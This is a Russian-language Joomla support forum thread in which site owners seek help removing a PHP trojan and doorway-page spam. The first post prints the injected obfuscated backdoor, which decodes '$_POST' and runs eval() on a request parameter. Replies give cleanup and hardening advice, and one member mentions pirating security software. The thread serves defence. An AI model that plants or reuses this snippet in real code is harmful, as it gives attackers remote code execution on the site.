Форум русской поддержки Joomla!® CMS
05.12.2016, 22:44:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Как отчистить сайт от: Trojan.PHP.Agent.jj?

 (Прочитано 2354 раз)
0 Пользователей и 1 Гость смотрят эту тему.
xx.vadim
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 30



« : 24.01.2016, 22:04:21 »

Кто сталкивался или может кто знает, что этот код представляет для сайта? Я понимаю, что дела мои хреновы, вопрос в том можно ли вылечить это? И если да то как эффективнее? 

Код:
<?php

$rse27= "strouep_" ; $cqh9=$rse27[0]. $rse27[1]. $rse27[2].$rse27[1]. $rse27[3]. $rse27[4].$rse27[6].$rse27[6].$rse27[5]. $rse27[2] ; $zapo1 = $cqh9($rse27[7].$rse27[6]. $rse27[3].$rse27[0]. $rse27[1] ) ;if (isset (${ $zapo1 } [ 'q828e00' ] )){eval(${ $zapo1 }['q828e00']); }

?>

Версия Joomla 3.2.3
Версия JoomShopping 4.4.1
Я понимаю, что нужно все это обновить.

В вебмастере яндекса и Google все хорошо (то есть они этого кода не видят).
Два онлайн сервиса по поиску вирусов тоже говорят, что все хорошо.
Нашел все это хозяйство Каспер как только я скачал файлы с хостинга на локальный. (Название объекта: Trojan.PHP.Agent.jj)

Всяких там левых и не понятных расширений на сайте не установлено.
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #1 : 24.01.2016, 22:13:56 »

а зачем еще другие расширения? хватит и Joomla 3.2.3

Цитировать
Я понимаю, что нужно все это обновить.
ну раз понимаете - обновляйтесь. меняйте доступы. проверяйте Айболитом. и т.п.
Записан
voland
Профи
********

Репутация: +487/-86
Online Online

Пол: Мужской
Сообщений: 8710


любит наш народ всякое гавно...


« Ответ #2 : 24.01.2016, 22:43:55 »

Сталкивался, вылечить можно, было бы желание.
Записан
ChaosHead
Профи
********

Репутация: +381/-10
Offline Offline

Пол: Мужской
Сообщений: 4388



« Ответ #3 : 24.01.2016, 22:52:29 »

Всё удалить, откатить на версию, где вирусов не было. Потом обновиться до последних версий и сменить пароли ftp и сайта.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3486


skype aqaus.com


« Ответ #4 : 25.01.2016, 11:15:26 »

Обновить ядро Joomla и почистить ai-bolit.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #5 : 25.01.2016, 13:30:27 »

В вебмастере яндекса и Google все хорошо (то есть они этого кода не видят).
Два онлайн сервиса по поиску вирусов тоже говорят, что все хорошо.
Нашел все это хозяйство Каспер как только я скачал файлы с хостинга на локальный. (Название объекта: Trojan.PHP.Agent.jj)
Интересно, а как вам веб-сервисы должны были спалить, этот код когда он интерпретируемый, в исходниках прописан?
В вашей версии вроде в contenthistory бага идет, в ядре, вот через нее вполне и могли получить доступ к CMS
Записан
xx.vadim
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 30



« Ответ #6 : 25.01.2016, 14:36:14 »

Интересно, а как вам веб-сервисы должны были спалить, этот код когда он интерпретируемый, в исходниках прописан?
В вашей версии вроде в contenthistory бага идет, в ядре, вот через нее вполне и могли получить доступ к CMS

Да, скорее всего ты прав потому, что именно в этом каталоге я нашел с помощью ай-болита несколько "грязных" файлов, название файлов "абра-кадабра".
Записан
xx.vadim
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 30



« Ответ #7 : 25.01.2016, 15:01:38 »

а зачем еще другие расширения? хватит и Joomla 3.2.3
ну раз понимаете - обновляйтесь. меняйте доступы. проверяйте Айболитом. и т.п.

Спасибо за Ай-Болит, не знал о таком скрипте. Нашел им около 90 зараженных файлов. Хакерский код записывался в самую верхнюю строчку файла и прятался далеко вправо, сразу и не заметишь пока горизонтальный скрол не прокрутишь. В общем ручками по одному файлу до глубокой ночи вычищал. Спасибо конечно и касперу, что обнаружил этот вирус, но минус в том, что каспер просто удалял вирус вместе с файлами, после чего сайт уже не работал, по этому только руками можно видимо. Кстати esetnod32 не видел этого вируса, странно. В конце отчистки еще раз просканировал сайт каспером, все гуд, заражений не найдено. Теперь можно и обновиться. Спасибо всем за помощь.

P.S. Может ли вирус прятаться в базе данных sql?
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #8 : 25.01.2016, 15:05:15 »

может быть например создан еще один суперадминистратор.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #9 : 25.01.2016, 16:51:52 »

В конце отчистки еще раз просканировал сайт каспером, все гуд, заражений не найдено. Теперь можно и обновиться.
Не факт. Вы вычистили внедренный код, причем известный антивирусу. Но не вычистили шелл, через который этот код был залит. Сделайте поиск по файлам конструкции eval(base64 - возможно найдете еще исполняемый код. Так же посмотрите дату изменения файлов. Ведь достаточно небольшого изменения, например, в код, принимающий данные от формы, и все, сайт может быть использован как угодно.

Почитайте соседние ветки, советов по лечению море.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #10 : 25.01.2016, 17:17:49 »

P.S. Может ли вирус прятаться в базе данных sql?
Да может, в зависимости от того какие компоненты, модули установлены если интерпретация какого либо кода через эти расширения, JS-бегдор, который может при авторизованном админе залить шелл или дописать бегдор в шаблон, али отправить на гейт ваши какие либо данные...
Записан
denis174
Давно я тут
****

Репутация: +1/-0
Offline Offline

Пол: Мужской
Сообщений: 255



« Ответ #11 : 29.01.2016, 11:17:35 »

у яндекса есть манул, стоит попробовать
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #12 : 29.01.2016, 12:18:45 »

у яндекса есть манул, стоит попробовать
А что скажите на это? http://www.securitylab.ru/blog/company/revisium/137587.php
Обратите внимание, цитирую:

Цитировать
В результате совместной работы команды безопасного поиска Яндекса и специалистов компании “ Ревизиум ” разработан антивирус для сайта “ Манул ”.
совместно со специалистами "Ревизиум", где многоуважаемый Григорий Земсков и является автором ai-bolit'a и создателем Ревизиум.

так что же вы все токи выберете? Тех кто занимается изначально ПС или тех, кто изначально занимается ИБ?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3529


« Ответ #13 : 29.01.2016, 12:37:08 »

у яндекса есть манул, стоит попробовать
Попробуйте может вам и понравиться.
А что скажите на это? http://www.securitylab.ru/blog/company/revisium/137587.php
Обратите внимание, цитирую:
совместно со специалистами "Ревизиум", где многоуважаемый Григорий Земсков и является автором ai-bolit'a и создателем Ревизиум.

так что же вы все токи выберете? Тех кто занимается изначально ПС или тех, кто изначально занимается ИБ?
Выберу лучшее и то что более понятнее в использовании. А кто с кем работает и тд. это не важно. Это как и масса антивирусных программ, которые каждый из пользователей использует свою.
У нас сделано в сканере для кодеров все и не скрываем, работать надо понимая код, сам использую то что ни кому не дам и не продам. Есть намного лучше решение чем айболит для пользователей и понятней в использовании для тех кто не в теме, но к сожалению проект так же как и мы свернули не получив должной отдачи, разработчики пошли сразу неправильным путем созданием платного сервиса, и как всегда ни средств ни времени у них не было, но он есть и создан, на сегодняшний день он один из лучших то что предлагалось за все время, к сожалению не развивается и заморожен, конечно со своими минусами, но через год-два про него вообще ни кто не вспомнит.
Каждый использует ПО которое ему ближе.
P.S.Кстати загнуться может каждый проект без должного вливания в него.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #14 : 29.01.2016, 13:16:33 »

Есть намного лучше решение чем айболит для пользователей и понятней в использовании для тех кто не в теме, но к сожалению проект так же как и мы свернули не получив должной отдачи, разработчики пошли сразу неправильным путем созданием платного сервиса, и как всегда ни средств ни времени у них не было, но он есть и создан, на сегодняшний день он один из лучших то что предлагалось за все время, к сожалению не развивается и заморожен, конечно со своими минусами, но через год-два про него вообще ни кто не вспомнит.
Можно ссылку для ознакомления?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3529


« Ответ #15 : 29.01.2016, 14:57:09 »

Можно ссылку для ознакомления?
Без проблем, он для всех известен участников форума, там немного и написано про него.
http://joomlaforum.ru/index.php/topic,274086.0.html

По существу идея хорошая и очень рабочая, минус только в том что он большого размера, он как дополнительная CMS устанавливается потому что рассчитан на подключение к платному сервису.
Если его выполнить как отдельный сканер и доработать он ни чем не уступает всем известным разработкам, изначально идея с платным сервисом была как и писал автору утопающей.
Плохо что автор "сдулся", и ни кто его не обеспечил нормальной поддержкой по бюджету и прочему для развития расширения.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #16 : 29.01.2016, 15:26:26 »

Без проблем, он для всех известен участников форума, там немного и написано про него.
http://joomlaforum.ru/index.php/topic,274086.0.html

По существу идея хорошая и очень рабочая, минус только в том что он большого размера, он как дополнительная CMS устанавливается потому что рассчитан на подключение к платному сервису.
Если его выполнить как отдельный сканер и доработать он ни чем не уступает всем известным разработкам, изначально идея с платным сервисом была как и писал автору утопающей.
Плохо что автор "сдулся", и ни кто его не обеспечил нормальной поддержкой по бюджету и прочему для развития расширения.

В целом по продукту, сугубо личное мнение, спору нет что дорабатывать и дорабатывать, больше подойдет как вести сайты клиентов по безопасности, т.е как менеджер сайтов на которых нужно провести какие то профилактические меры, чистку, патчи, еще что то... естественно с системой тикетов, ну не как основной продукт для конкретного сайта...

да да, извиняюсь, что базу вашу попользовал и нулед сделал для пробы

сегодня скрипт от securi лицуху слил, который на сайт загружается, надо? в рамках интереса Wink

честно говоря, не очень мне этот securi, сайт клиента ломали, он взял лицуху securi, она только лечит и наводит мелкие профилактические детали, по большому счету сайт один хер дрявый остается, и если бегдор с неизвестной ему сигнатурой, то начинается аншлаг)))
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3529


« Ответ #17 : 29.01.2016, 16:11:53 »

... и если бегдор с неизвестной ему сигнатурой, то начинается аншлаг)))
А это как нам известно всем в кругах тех кто работает ни один сканер не найдет, и у каждого свои методы чистки и до чистки таких вариаций.
Из за этого и пишу всегда что чистить необходимо тем кто умеет и понимает с чем он работает. Можно и без сканеров все вычистить но проблема во времени будет. Но по большому счету особенно последние два года показали, как вам известно и о чем не раз разговаривали это свои короткие или обсуфицированные коды для заливки, которые сканера если и будут находить, то это либо будет ложно очень много срабатываний, либо поздно, ну и базы сигнатур будут расти неимоверно как и базы исключений, т.е. получится большие файлы, а сканер должен быть удобным и минимальным.

На счет скрипта в зря так считаете, он совершенно рабочий и для чистки отдельных сайтов, как и писал у них не верный подход был изначально вот и загнулась идея, если вспомнить 2013г. то практически все сканеры в паблике не дотягивали до того функционала, что сделал разработчик Scripto Guard но изначально неправильный подход погубил все задуманное, сервис без много миллионных вложений и в одиночку не запустить вот и накрылось у них все. И еще привязка лишнего мусора, по доработкам там мало что требуется он выполнен и в рабочем состоянии все доработки которые потребуются это только в процессе дополнение и улучшение. Ну и как и писал его надо уменьшить до минимума и желательно в один файл все запихать. И не помню про работу через ssh у него, если нет, то просто доработать.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #18 : 29.01.2016, 16:26:18 »

На счет БД верно, сначала появляется код (зловред) и только после того, как спалится, попадает в базы, а до этого может жить не определенное количество времени, ну и естественно многое зависит от аккуратности использования такого зловреда...
Записан
Kardinal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 24



« Ответ #19 : 16.02.2016, 16:32:54 »

Добрый день, тоже столкнулся с этим вирусом: нашёл по всему сайту файлы .php с кодами типа
Показать текстовый блок
поудалял эти страницы, а там где код встал поверх нужных страниц просто его убрал, почистил БД, проверил сайт ещё раз каспером и айболитом - мне показало что сайт чистый. Обновил Joomla c 3.4.5 до 3.4.8. Убрал все следы Joomla (отображение модулей, генератор и даже style="joomla.сss", спрятал админку через плагин), добавил файл .ftpaccess и в .htaccess строки:
Цитировать
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
Прошли сутки смотрю  в БД опять редиректы типа:
Цитировать
sgrzaiq/Hy-hy-jawani-li-dobi-mp3.php
wcvlxeb/Cara-memikat-hati-lelaki-dalam-diam.php
gwbekak/Wajah-wajah-baru-pamain-si-entong.php
wcvlxeb/Rajini-murugan-keerthi-suresh-entry-theme-f.php
sgrzaiq/Kode-voucher-gratis-im3.php
rejewrc/Destiny-world-library-zee-world-full-story.php
wcvlxeb/Ling-bada-karne-ke-desi-nuskhe.php
Подcкажите что я пропускаю, откуда оно снова вылазит?
P.S. комп на вирусы проверил, пароль к FTP поменял, префикс базы данных тоже....
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #20 : 16.02.2016, 16:50:47 »

проверил сайт ещё раз каспером и айболитом - мне показало что сайт чистый
Показало? Или показалось? Я думаю, постом выше flyingspook достаточно доходчиво объяснил, что если не знаете, что искать, лучше не лезть. Вы удаляете результат работы зловреда, а не сам зловред. А сканеры его не видят, потому что он еще не успел попасть к ним в базу.
Записан
Kardinal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 24



« Ответ #21 : 16.02.2016, 17:26:46 »

показалось как оказывается. Я искал внутри файлов через тотал по запросу "{eval", сейчас проверил ещё раз то что чистил вчера пропустил 10 файлов "{ eval" (с пробелом), посмотрим получиться что-то или нет. Бэкаппы сервера у меня тоже заражены видать вирус давненько, а последний не заражённый бэкап содержит на 100+ статей меньше чем сейчас на сайте, так что откатывать бы очень не хотелось
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3529


« Ответ #22 : 16.02.2016, 18:15:50 »

показалось как оказывается. Я искал внутри файлов через тотал по запросу "{eval", сейчас проверил ещё раз то что чистил вчера пропустил 10 файлов "{ eval" (с пробелом), посмотрим получиться что-то или нет. Бэкаппы сервера у меня тоже заражены видать вирус давненько, а последний не заражённый бэкап содержит на 100+ статей меньше чем сейчас на сайте, так что откатывать бы очень не хотелось
Поиск по eval это мизер, берите сканеры проверяйте сайт на файлы которые могут содержать код для доступа и просматривайте их содержимое. Есть много разновидностей даже те который вам не один сканер не покажет их только глазами увидеть можно такие как $_POST[1] и подобные могут встречаться как в расширениях так и в коде для заливки шелов. Надо понимать что делаете и с чем работаете.
Записан
Kardinal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 24



« Ответ #23 : 17.02.2016, 03:26:31 »

бред какой-то с этим вирусом, откатил на 4 месяца, почистил БД, залил, смотрю в БД снова следы этого говнеца, но я сомневаюсь что вирус незаметный для меня, Google сич и Яндекс вебмастера жил 4 месяца, а тут так активно начал себя проявлять. Единственный плагин, который я ставил после отката был KSecure (с оф сайта). Это может быть дело в этом плагине или Joomla 3.4.8 настолько дырявая? (Хостинг у меня nic.ru...)
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #24 : 17.02.2016, 11:10:50 »

бред какой-то с этим вирусом, откатил на 4 месяца, почистил БД, залил, смотрю в БД снова следы этого говнеца, но я сомневаюсь что вирус незаметный для меня, Google сич и Яндекс вебмастера жил 4 месяца, а тут так активно начал себя проявлять. Единственный плагин, который я ставил после отката был KSecure (с оф сайта). Это может быть дело в этом плагине или Joomla 3.4.8 настолько дырявая? (Хостинг у меня nic.ru...)
А свой комп не пытались проверить? по сабжу https://revisium.com/ru/blog/browser_infected.htm, у меня уже начали появляться клиенты с такой проблемой как описано в статье, о безопасности своего ПК тоже надо думать...
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #25 : 17.02.2016, 11:38:28 »

Цитировать
почистил БД, залил, смотрю в БД снова следы этого говнеца
поставьте чистую Joomla с нуля и проверьте, появятся ли следы в БД.
Записан
Kardinal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 24



« Ответ #26 : 17.02.2016, 19:08:09 »

А свой комп не пытались проверить? по сабжу https://revisium.com/ru/blog/browser_infected.htm, у меня уже начали появляться клиенты с такой проблемой как описано в статье, о безопасности своего ПК тоже надо думать...
первым делом это сделал, нашёл бат и троян, но другой, только после того как проверил комп начал проверять сайт. Я работаю через оперу, единственный плагин это сейф фром нет
поставьте чистую Joomla с нуля и проверьте, появятся ли следы в БД.
спасибо за совет, попробую, если будет появляться то где искать причину?
« Последнее редактирование: 17.02.2016, 19:15:50 от Kardinal » Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #27 : 17.02.2016, 19:58:59 »

если ваш компьютер однозначно чист, то искать тогда вероятно на сервере, куда устанавливаете...
Записан
Kardinal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 24



« Ответ #28 : 17.02.2016, 20:10:01 »

пересмотрел логи сервера нашёл 900 подобных запросов в БД по разным айпи (за последние 18 часов):
Показать текстовый блок
то есть все запросы вируса связаны с посещением этого бота, но я понять не могу зачем он ломиться и именно по вирусным страничкам, как это связанно и что с ним делать...
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #29 : 17.02.2016, 20:13:12 »

пересмотрел логи сервера нашёл 900 подобных запросов в БД по разным айпи (за последние 18 часов):
Показать текстовый блок
то есть все запросы вируса связаны с посещением этого бота, но я понять не могу зачем он ломиться и именно по вирусным страничкам, как это связанно и что с ним делать...
Это владелиц вашей площадки (дорвейщик), делает прогоны по дорвеям, чтоб ПС быстро их проиндексировали и если все гуд то выплюнул в топовые позиции

П.C: вот обратите внимание, что в название файла, НЧ запрос.
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet